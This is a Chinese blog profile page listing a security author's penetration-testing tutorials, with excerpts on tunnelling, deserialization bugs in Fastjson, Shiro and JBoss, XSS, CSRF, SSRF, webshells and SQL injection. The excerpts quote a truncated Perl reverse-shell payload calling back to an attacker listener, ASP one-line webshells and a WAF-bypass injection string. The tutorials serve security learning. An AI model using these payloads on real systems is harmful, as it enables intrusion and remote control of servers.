自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(29)
  • 收藏
  • 关注

原创 隐藏通信隧道技术(下)

一、传输层隧道技术1.Netcat获取shell(反向shell)第一种:如果目标主机安装nc在本地监听5555端口 在目标主机上输入一下payload Socket;$i="10.2.1.170";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(S.

2022-04-08 00:24:14 4459 2

原创 隐藏通信隧道技术(上)

目录一、防火墙的配置二、kali虚拟机网卡配置三、隐藏隧道技术的基础知识1.什么是隧道技术:2.检测内网连通性3.利用icmp创建隧道(1)使用的工具: icmpsh(2)工具:Pingtunnel4.传输层隧道技术4.1使用nc工具创建隧道一、防火墙的配置1..首先进去防火墙,此时我们需要配置符合自己环境的ip2.先配置lan ip首先需要输入2,配置ip地址(仅主机) 输入子网掩码位数 是否需要dhcp服务 注意:此时需要配置仅主..

2022-04-07 01:15:50 4490 2

原创 Fastjson反序列化漏洞

一、fastjson简介fastjson是java的一个库,可以将java对象转化为json格式的字符串,也可以将json格式的字符串转化为java对象提供了 toJSONString() 和 parseObject() 方法来将 Java 对象与 JSON 相互转换。调用toJSONString方 法即可将对象转换成 JSON 字符串,parseObject 方法则反过来将 JSON 字符串转换成对象。二、fastjson反序列化漏洞原理在反序列化的时候,会进入parseField方法,进

2022-03-31 22:52:08 32952 12

原创 shiro反序列化漏洞的原理和复现

一、shiro简介Shiro是一个强大的简单易用的Java安全框架,主要用来更便捷的认证,授权,加密,会话管理。Shiro首要的和最重要的目标就是容易使用并且容易理解。二、shiro的身份认证工作流程通过前端传入的值, 获取rememberMe cookie base64加密 AES加密 (对称加解密) 反序列化三、shiro反序列化漏洞原理AES加密的密钥Key被硬编码在代码里,意味着每个人通过源代码都能拿到AES加密的密钥。因此,攻击者构造一个恶意的对象,并且对其序列化,AES

2022-03-31 22:51:42 15573 3

原创 Tomcat漏洞解析与复现

Tomcat是Apache开源组织开发的用于处理HTTP服务的项目,两者都是免费的,都可以做为独立的Web服务器运行。Apache Tomcat服务器存在文件包含漏洞,攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件或源代码等。tomcat默认的conf/server.xml中配置了2个Connector,一个为8080的对外提供的HTTP协议端口,另外一个就是默认的8009 AJP协议端口,两个端口默认均监听在外网ip。一、Aapach

2022-03-31 02:26:26 3278 1

原创 其他常见的getshell方式

ASP常用的一句话木马:<%eval request(“hack")%> <%execute request(“hack")%> <%execute(request(“hack"))%> <%ExecuteGlobal request(“hack")%>一、修改配置文件getshellHadSky5.5.2.20180525存在配置文件写入导致getshell 安装过程总共五个步骤来进行安装,每一步程序将会引用一些文件进行操作,但是由于inst

2022-03-31 02:22:31 3812

原创 Apache漏洞原理与复现

一、Apache简介Apache HTTP Server(简称Apache)是Apache软件基金会的一个开放源码的网页服务器,可以在大多数计算机操作系统中运行,由于其多平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩展,将Perl/Python等解释器编译到服务器中。二、Apache的历史漏洞Apache路径穿越漏洞(CVE-2021-41773) Apache 路径穿越漏洞(CVE-2021-42013) Apache SSRF漏洞(CVE-

2022-03-30 20:20:08 3920

原创 Nginx文件解析漏洞的原理与复现

一、Nginx的简介Nginx (engine x) 是一款轻量级的Web 服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,在BSD-like 协议下发行。其特点是占有内存少,并发能力强,事实上nginx的并发能力在同类型的网页服务器中表现较好,中国大陆使用nginx网站用户有:百度、京东、新浪、网易、腾讯、淘宝等二、Nginx漏洞的原理1,Nginx越界读取缓存漏洞(CVE-2017-7529) 可以读取到缓存文件中位于“HTTP返回包体”前的“文件头”、“HTTP返回包头”

2022-03-30 01:04:34 7543 2

原创 Jboss反序列化漏洞的复现与原理

一、什么是JbossJboss是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。 Jboss属于redhat公司,而且jboss是开源的,免费的,且在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器,所以曾经广为流行。二、Jboss的历史漏洞1.jboss反序列化漏洞,CVE-2017-7504漏洞存在/jbossmq-httpi

2022-03-29 22:02:18 5064 4

原创 反序列化漏洞详解

目录一、什么是序列化和反序列化二、什么是反序列化漏洞三、序列化函数(serialize)四、反序列化(unserialize)​五、什么是PHP魔术方法六、一些常见的魔术方法七、魔术方法的利用八、反序列化漏洞的利用1.__destruct()函数2.__wakeup()3.toString()​九、反序列化漏洞的防御一、什么是序列化和反序列化序列化是将对象转换为字符串以便存储传输的一种方式。而反序列化恰好就是序列化的逆过程,反序列化会将字符串.

2022-03-07 23:55:48 36164 3

原创 任意代码执行漏洞

一、什么是任意代码执行漏洞web应用程序是指程序员在代码中使用了一些执行函数例如eval,assert等函数,用户可以控制这个字符串去这些函数中执行,从而造成安全漏洞二、漏洞的危害执行任意的代码,例如协议脚本文件 向网站写入webshell 控制整个网站或者服务器三、任意代码执行的漏洞1.eval()函数...

2022-02-23 19:19:35 3359 4

原创 SSRF(服务器请求伪造)

一、什么是ssrf漏洞SSRF(service side request forgery) 为服务器请求伪造,是一种右攻击者形成服务器端发起的安全漏洞。二、造成ssrf的原因有些web网站会提供从其他服务器上传数据的功能,会使用用户指定的url获取数据。由于对远程的url没有进行严格的过滤,所以攻击者可以通过该漏洞控制该web网站作为代理服务器攻击远程服务器或者该web的本地服务器。三、ssrf漏洞的危害可以对内网,本地进行端口扫描,查看端口的关闭状态; 攻击运行在内网或者本地的应用程

2022-02-23 17:11:24 21667 3

原创 利用文件包含漏洞-getshell

一、什么是文件包含漏洞文件包含是指应用程序没有对引用的文件做合理的校验,导致包含的文件中含有恶意的代码,并且执行了该代码。从而产生了文件包含漏洞二、文件包含漏洞的利用条件1.引用一个任意类型的文件2.程序读取文件并且执行三、将木马程序放入某个本地文件中。1.利用网站报错日志写入木马程序2.利用文件上传功能,上传含有木马的任意文件四、文件包含getshell1.本地文件包含getshell网站会将一些错误信息记录到日志文件中,我们可以利用这个特性将木马写入日志文件中去

2022-02-22 21:22:08 7565 2

原创 WEBshell与文件上传漏洞

一、文件上传漏洞的原理如果web应用程序对上传文件的安全性没有过滤和校验,攻击者可以通过上传webshell恶意文件对服务器进行攻击 。二、文件上传的原理1.有文件上传功能2.上传文件的目录能解析脚本文件3.能访问到上传的文件三、文件上传攻击文件上传防护和绕过手段1.文件上传漏洞--绕过前端js检测由于网站客户端对文件的上传类型做了限制,不允许我们上传.php文件,我们可以通过bp抓取发送数据包,然后将数据包做改变即可...

2022-02-19 23:43:48 4851 4

原创 WEB安全-CSRF攻击原理

一、什么是CSRF漏洞的跨站请求伪造(Cross-site request forgery),通常简称为CSRF或者XSRF。是一种通过借用用户的权限在网站上执行并非自己本意的操作。二、CSRF漏洞具体可以干什么以你的名义(发邮件;发消息;修改密码;转账;购买商品等)三、CSRF成立的必要条件1.受害者没有退出当前页面,也就是说cookie值没有过期。2.受害者点击了攻击者所发送的恶意连接。四、CSRF漏洞的原理首先当用户登录并浏览一个可信网站时,攻击者发送一个恶意链接,用户

2022-02-18 22:23:58 622

原创 XSS注入绕过防护

一、输入与输出的防护机制字符实体化 关键字变形 关键字去除 尖括号去除二、xss防护规则的绕过1.大小写,双写绕过为了避免XSS漏洞的存在,通常应用会对用户输入进行一定的安全处理后再输出的HTML中,防护的方法有:过滤:发现关键字返回错误 编码:对关键字进行编码 插入:插入改变关键字的符号 删除:删除关键字绕过防护的思路:判断关键字 判断防护规则 尝试不同的payload 大小写,双写关键的符号有:' " ()<>{}=&--;关键..

2022-02-17 23:26:49 1367

原创 手动挖掘XSS漏洞

一、xss注入的思路在目标网站找到注入的点,例如注册,留言,搜索,提交,评论等页面 在注入点输入一些字符,' " < > script alert javascript,点击提交查看是否被过滤。 通过未过滤的语句判断是否可以进行js代码的编写 提交构造的脚本,或者通过绕过的方式查看源码,判断是否存在xss漏洞 一般查询接口、用户登录、搜索、订单提交容易出现反射型XSS,留言板、评论、用户昵称、用户信息等凡是可以提交数据由服务器进行存储和显示的位置都有可能出现存储型跨站容易出现存储型X

2022-02-17 23:11:17 2751

原创 XSS注入的原理与实现

一、JavaScript的常用脚本1.window.location.href 用来跳转页面eg:<script>window.location.href='www.jd.com'</script>2.document.cookie获取客户端的cookie值3.script 可以通过“src”属性引入JavaScript文件二、什么是同源策略 同源策略在web应用的安全模型中是一个重要概念。在这个策略下,web浏览器允许第一个页面的脚本访问第...

2022-02-17 09:22:01 4596

原创 SQL注入-getshell

一、getshell的含义1.什么是shell?Shell 是一个程序,提供一个用户与操作系统内核连接的环境。这个环境只有一个命令提示符,让用户从键盘输入命令,所以又称为命令行环境。2.什么是webshell?WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执

2022-02-15 22:51:51 10894 1

原创 SQL注入-绕过安全狗

绕过安全狗的常见四种方式id=1'/*!44444order*/ /*!44444by*/3--+

2022-02-15 19:42:38 5099

原创 渗透工具- SQLMap

一、sqlmap的介绍

2022-02-13 23:43:28 643

原创 kali虚拟机如何配置静态IP

kali配置静态IP

2022-02-13 22:04:21 21045 8

原创 SQL注入-基于MSsql(sql server)的注入

目录一、如何判断该网站使用的是sql server 数据库二、sql server 数据库包含三张主要系统表三、sql server 主要函数四、数据库的注入流程五、sql server 的联合查询六、sql server 的报错注入七、sql server 的布尔型盲注。一、如何判断该网站使用的是sql server 数据库根据后缀判断:如果后缀为aspx,数据库大概是sql server 根据报错信息判断,报错信息中有Microsoft 字样。 根据系统表判断,a

2022-02-13 19:26:23 6137 1

原创 SQL注入-二次注入和多语句注入

一、二次注入的定义简单的说二次注入就是已经存储到数据库中的用户输入,在进行再一次读取的时候进去SQL查询语句中的注入。二、二次注入的原理第一步:插入恶意数据第一次进行数据库插入数据的时候,仅仅对其中的特殊字符进行了转义,在写入数据库的时候还是保留的原来的数据,但是数据本身包含恶意内容。第二步:引用恶意在将数据存入数据库后,开发者认为数据是可信的,在下一次需要进行的查询的时候,直接从数据库中提出了恶意数据,没有进行进一步的检验和处理,就会造成sql的二次注入数据三、二次注入原理的演

2022-02-11 18:41:13 1015

原创 SQL注入-HTTP头部注入

一、http头部注入-User-Agent1.user-agent 是什么用户代理(User Agent,简称 UA),是一个特殊字符串头,使得服务器能够识别客户使用的操作系统及版本、CPU 类型、浏览器及版本、浏览器渲染引擎、浏览器语言、浏览器插件等。2.http头部(user-agent)注入原理由于后端对user-agent的数据保存到数据中,此时我们可以就可以利用SQL注入。3.http头部(user-agent)注入的实现3.1.打开sqlilabs/Less-18/i

2022-02-11 18:17:29 2909

原创 SQL注入-cookie注入

cookie 注入

2022-02-11 17:12:55 1957

原创 SQL注入-盲注(布尔盲注与时间盲注)

一、什么是盲注盲注就是在sql注入过程中,sql语句执行select之后,可能由于网站代码的限制或者apache等解析器配置了不回显数据,造成在select数据之后不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个判断的过程称之为盲注。通俗的讲就是在前端页面没有显示位,不能返回sql语句执行错误的信息,输入正确和错误返回的信息都是一致的,这时候我们就需要使用页面的正常与不正常显示来进行sql注入。二、盲注的分类基于布尔类型的盲注 基于时间类型的盲注三、利用盲注的

2022-02-10 19:11:56 16980 2

原创 SQL注入-报错注入

sql注入之报错注入的演示与介绍

2022-02-09 18:38:43 10238 1

原创 HTTP协议的详细介绍

目录一、何为HTTP协议1.HTTP协议详细信息2.HTTPS协议:3.HTTP协议的特点二、HTTP协议 请求方式HTTP1. 0定义了三种请求方法:1.GET2.POST3.HEADHTTP1. 1 新增了五种请求方法:1.OPTIONS2.PUT3.DELETE4.TRACE5.CONNECT三、HTTP协议状态码一、何为HTTP协议所谓协议,就是指双方遵循的规范。1.HTTP协议详细信息HTTP协议,就是浏览器和服.

2022-01-20 23:24:15 11872 3

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除